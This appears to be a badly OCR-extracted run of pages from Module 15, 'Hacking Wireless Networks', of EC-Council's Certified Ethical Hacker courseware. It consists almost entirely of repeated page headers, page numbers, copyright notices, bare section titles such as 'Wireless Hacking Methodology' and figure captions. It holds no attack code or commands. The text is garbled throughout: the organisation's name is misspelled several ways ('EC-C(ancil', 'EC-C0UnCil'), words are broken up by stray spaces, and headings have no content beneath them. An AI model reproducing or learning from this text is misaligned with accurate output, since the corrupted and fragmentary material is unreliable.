W e t* 0 1

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Pre se n te d by Professio nals.

Module 15 Page 2135

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Copyright by EC-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

S m artp h o n e Wi-Fi S earches Offer M a ss iv e New D ata L e a k a g e V ector

Module 15 Page 2136

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2137

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2138

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wireless Penetration Testing

Wireless Traffic Analysis

Module 15 Page 2139

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wireless Hacking Methodology

Wireless Hacking Tools

Module 15 Page 2140

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2141

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2142

Ethical Hacking and Countermeasures Copyright by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2143

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

FIG URE15.1: Wi-Fi Device Type Com parison in th e y e a r 2011

Module 15 Page 2144

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

http ://w w w .m eraki.c o m

FIGURE15.2: Wi-Fi Device Type Comparison in the year 2010

Module 15 Page 2145

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Networks at Home and Public P laces

W i-Fi at Public Places

Module 15 Page 2146

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Types of Wireless Networks

Extension to a Wired Network

Multiple Access Points

LAN-to-LAN Wireless Network

Module 15 Page 2147

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

FIGURE15.3: Extension to a Wired Network

Module 15 Page 2148